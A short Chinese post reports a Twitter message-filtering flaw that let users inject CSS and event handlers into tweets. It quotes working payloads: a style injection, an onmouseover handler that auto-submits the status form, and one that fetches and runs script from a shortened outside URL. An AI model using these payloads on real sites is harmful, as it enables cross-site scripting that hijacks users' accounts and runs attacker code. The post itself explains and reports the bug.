@rainbowtwtr 发现在推特页面消息中注入 CSS 代码的方法,发出了一副彩虹旗(是国际同性恋利权的标志)画面:
比如红色彩条的代码如下:http://twitter.com/RainbowTwtr/status/25098128726
http://twitter.com/RainbowTwtr#@“style=”background-color:red;color:red;position:absolute;top:0;left:0;width:100%;height:100%”/ 我也测试发了一幅五色旗: 这是 twitter 服务器程序过滤用户提交的消息文字中内容不彻底造成的,可能带来安全威胁。比如如下两位开始测试如何调用外部 CSS 代码,以及令用户鼠标移动到文字上,就提交推特主页面上输入框里的文字,也就是可以诱使推特用户执行意外动作。 http://twitter.com/jak9c/status/25112535104
http://a.no/@“onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit()” style=”color:#000;background:#000;/ http://twitter.com/janlay/status/25112521002
http://t.co/@“style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:u002fu002fis.gdu002ffl9A7‘)”/